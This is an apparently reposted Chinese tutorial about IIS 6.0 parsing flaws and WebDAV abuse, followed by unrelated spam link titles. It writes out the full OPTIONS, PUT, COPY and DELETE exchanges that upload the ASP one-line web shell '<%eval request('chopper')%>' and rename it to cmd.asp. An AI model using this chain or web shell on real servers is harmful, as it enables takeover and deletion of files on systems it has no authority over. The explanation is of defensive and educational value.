当前位置: 首页 > news >正文

网站建设创新成果长沙做优化的公司

news 2025/7/10 12:19:46
网站建设创新成果,长沙做优化的公司,公司网站建设制作全包,深圳品牌设计公司招聘IIS 6.0在解析文件时存在以下两个解析漏洞。 ①当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。 例如:建立文件夹 parsing.asp,在 parsing.asp 文件夹内新建一个文本文档 test.txt,其内容为&…

IIS 6.0在解析文件时存在以下两个解析漏洞。

①当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。

例如:建立文件夹 parsing.asp,在 parsing.asp 文件夹内新建一个文本文档 test.txt,其内容为<%=NOW()%>,然后在浏览器内访问。

“NOW()”是ASP提供获取当前时间的函数,TXT是文本文档格式,IIS是不会去解析此类文件的,应该会直接显示其内容,而在 parsing.asp文件夹中,却被当作ASP脚本来解析。

② 当文件为*.asp;1.jpg时,IIS 6.0同样会以ASP脚本来执行如:新建文件 test.asp;1.jpg,内容为<%=NOW()%>

微软并不认为这是一个漏洞,也一直没有推出IIS 6.0的补丁,所以这两个"漏洞"至今还存在,让无数的网站“死”在了IIS 6.0解析漏洞之上。

说到IIS容器,就不得不提起一个经典的漏洞,漏洞名为WebDav。

WebDav(Web-based Distributed Authoring and Versioning)是一种基于HTTP1.1协议的通信协议,它扩展了HTTP协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使HTTP协议更强大。

在开启WebDav扩展的服务器后,如果支持PUT、Move、Copy、Delete等方法,就可能会存在一些安全隐患,比如www.secbug.org服务器(IIS 6.0 Web容器)支持WebDav,并且存在PUT、Move、Copy、Delete等方法,那么攻击者就可能通过PUT方法向服务器上传危险脚本文件,测试步骤如下。

第一步:通过OPTIONS探测服务器所支持的HTTP方法。请求:

OPTIONS / HTTP/1.1 Host:www.secbug.org

响应:

HTTP/1.1 200 OK 
Cache-Control:private
Date: Mon,19 Aug 2013 09:41:45 GMT
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPPATCH, SEARC H,MKCOL,LOCK,UNLOCK Content-Length: 0 
Accept-Ranges: none 
Server: Microsoft-IIS/6.0 MS-Author-Via: DAV DASL:<DAV:sql>DAV: 1, 2
Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH Set-Cookie:_D_SID=89113465;path=/;

第二步:通过PUT方法向服务器上传脚本文件。

请求:

PUT/a.txt HTTP/1.1 
Host:www.secbug.org 
Content-Length:30 
<%eval request("chopper")%>

响应:

HTTP/1.1 201 Created
Date: Mon,19 Aug 2013 09:48:10 GMT
Allow:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,COPY,MOVE,PROPFIND,PROPPATCH, SEARCH,LOCK,UNLOCK Content-Length: 0
Location:http://www.secbug.org/a.txt Server: Microsoft-IIS/6.0

第三步:通过Move或Copy方法改名

COPY /a.txt HTTP/1.1 
Host:www.secbug.org
Destination:http://www.secbug.org/cmd.asp
HTTP/1.1 201 Created
Date: Mon,19 Aug 2013 09:53:43 GMT 
Content-Length: 0 
Content-Type: text/xml
Location:http://www.secbug.org/cmd.asp 
Server: Microsoft-IIS/6.0

通过这三个步骤,攻击者就可以轻易获取一个WebShell。

如果服务器开启了DELETE方法,攻击者还可以删除服务器上的任意文件。

DELETE /a.txt HTTP/1.1 Host:www.secbug.org
HTTP/1.1 200 OK
Date: Mon,19 Aug 2013 10:02:08 GMT 
Content-Length: 0 
Server: Microsoft-IIS/6.0
Set-Cookie: _D_SID=89113465;
path=/;

http://www.hrbkazy.com/news/21303.html

相关文章:

  • 厚街网站建设多少钱跨境电商平台
  • 网站开发平均工资开发一个app平台大概需要多少钱?
  • 成华区微信网站建设在线推广网站的方法
  • 临淄区住房和城乡建设局网站常用的网络营销工具有哪些
  • 公司做网站要三千多吗苹果cms永久免费全能建站程序
  • 某网络公司网站源码 蓝色建站企业网站源码新网站怎么快速收录
  • 网站开发能干什么湖南百度seo排名点击软件
  • wordpress5.2.2编辑器中文哈尔滨seo优化培训
  • pc端手机网站 样式没居中企业网络搭建方案
  • 建设工程教育网官方网站百度快照是什么
  • 域名注册新网厦门seo优化外包公司
  • 买房网站排名盐城seo培训
  • 成都家居网站建设万网查询
  • 网站分析报告网络推广优化
  • 网站佣金怎么做凭证做网站需要多少钱 都包括什么
  • 闲鱼怎么做钓鱼网站厦门百度关键词优化
  • 什么网站可以做期货关键词seo优化
  • 上海免费网站建设模板推荐网红推广
  • 公司网站百度搜索的描述怎么做江门关键词排名工具
  • 外贸出口新三样百度seo在哪里
  • 自考大专报名官网入口seo的搜索排名影响因素有哪些
  • 网站只用css做tab切换黄冈网站推广软件
  • 如何将WORDPRESS主题换成英文seo内部优化方式包括
  • 网络服务提供者知道或者应当知道网络福建企业seo推广
  • 公安网站建设方案书厦门seo网站优化
  • 国外电商网站如何建立bt鹦鹉磁力
  • 福州seo推广优化成都网站优化排名推广
  • wordpress 支付宝重庆seo点击工具
  • 做问卷调查赚钱的网站seo技巧是什么
  • 直播课网站怎样做的查排名的网站